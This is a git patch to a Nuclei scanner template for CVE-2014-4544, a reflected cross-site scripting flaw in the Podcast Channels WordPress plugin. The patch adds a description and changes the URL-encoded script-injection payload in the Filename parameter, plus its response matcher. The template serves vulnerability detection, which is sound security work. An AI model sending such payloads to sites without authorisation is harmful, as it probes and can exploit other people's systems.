From e339d5a0e83641840cf99697a7d77c8502bca854 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Sat, 25 Sep 2021 11:19:46 +0530
Subject: [PATCH] Update CVE-2014-4544.yaml

---
 cves/2014/CVE-2014-4544.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml
index a8380ef6d9..1d16c52c78 100644
--- a/cves/2014/CVE-2014-4544.yaml
+++ b/cves/2014/CVE-2014-4544.yaml
@@ -4,6 +4,7 @@ info:
   name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
   author: daffainfo
   severity: medium
+  description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
   reference:
     - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4544
@@ -12,13 +13,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E&"
+      - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "'><script>alert(document.cookie)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word